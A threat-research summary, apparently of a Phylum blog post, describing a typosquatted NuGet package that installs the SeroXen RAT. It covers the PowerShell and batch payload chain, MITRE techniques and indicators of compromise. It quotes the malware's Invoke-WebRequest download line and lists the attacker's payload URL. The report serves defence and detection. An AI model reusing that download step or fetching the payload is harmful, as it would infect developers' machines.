Threat Research

Phylum Discovers SeroXen RAT in Typosquatted NuGet Package

Securonix

Phylum detected a typosquatted NuGet package that delivered the SeroXen RAT, demonstrating how open-source ecosystems can be abused. The post details the typosquatted package, its obfuscated payload chain (PowerShell, batch scripts, DLLs), and download-count anomalies, underscoring the risk to developers and ecosystems. #SeroXen #NuGet #IGBOAT #Disti #Pathoschild.Stardew.Mod.Build.Config #Pathoschild.Stardew.ModBuildConfig

Keypoints

  • The malicious NuGet package Pathoschild.Stardew.Mod.Build.Config is a typosquat of the legitimate Pathoschild.Stardew.ModBuildConfig.
  • The malicious package includes both tools/init.ps1 and tools/install.ps1, and also a tools/uninstall.ps1, indicating full lifecycle coverage for the payload.
  • The init.ps1 script downloads a remote payload from a hardcoded URL and silently executes it, enabling covert installation.
  • The downloaded payload is a highly obfuscated batch file that decrypts and decompresses two DLLs, then loads and executes them via PowerShell, delivering SeroXen RAT.
  • The deobfuscated components eventually lead to payload.exe, which is identified as CSStub2 and ties back to SeroXen’s capabilities and obfuscation techniques.
  • The article highlights abuse of NuGet and download-count inflation as part of the campaign and notes SeroXen’s broader threat profile (encryption, anti-analysis, fileless traits).

MITRE Techniques

  • [T1195] Supply Chain Compromise – The package is a typosquat of a legitimate package – “The package is a typosquat of a legitimate package called Pathoschild.Stardew.ModBuildConfig.”
  • [T1059.001] PowerShell – The attack uses a PowerShell script to decrypt, decompress, and execute payloads within the same process. “Ultimately though, this script finds the first line in the batch script which begins with “SEROXEN” and subsequently decrypts and decompresses two DLLs from base64 encoded strings on that line before executing them in the same PowerShell process.”
  • [T1027] Obfuscated/Compressed Files and Information – The batch file is highly obfuscated and uses techniques to hide its true strings and commands. “This file uses several obfuscation techniques to make it look like a mess: It uses undefined variables to take up space…”
  • [T1105] Ingress Tool Transfer – The init.ps1 script downloads a remote payload via Invoke-WebRequest and saves it locally. “Invoke-WebRequest -Uri $a -OutFile $y -ErrorAction SilentlyContinue | Out-Null”
  • [T1140] Deobfuscate/Decode Files or Information – The process decrypts and decompresses embedded payloads from base64, reconstructing DLLs before execution. “decrypts and decompresses two DLLs from base64 encoded strings on that line before executing them…”

Indicators of Compromise

  • [IP] 66.23.238.220 – Remote URL used to fetch the payload (from the init.ps1 script) – “http://66.23.238.220/assets/images/icons/svg/x.bin”
  • [File] x.bin – Downloaded file name used to store the downloaded payload at the remote URL
  • [File] tempxxxxx.cmd – Path used to save and execute the downloaded payload
  • [File] payload.exe – Extracted executable identified as CSStub2
  • [Package] Pathoschild.Stardew.Mod.Build.Config – Malicious NuGet package published by Disti
  • [Package] Pathoschild.Stardew.ModBuildConfig – Legitimate package that the malicious one typosquatted
  • [Publisher] Disti – NuGet publisher associated with the malicious package

Read more: https://blog.phylum.io/phylum-discovers-seroxen-rat-in-typosquatted-nuget-package/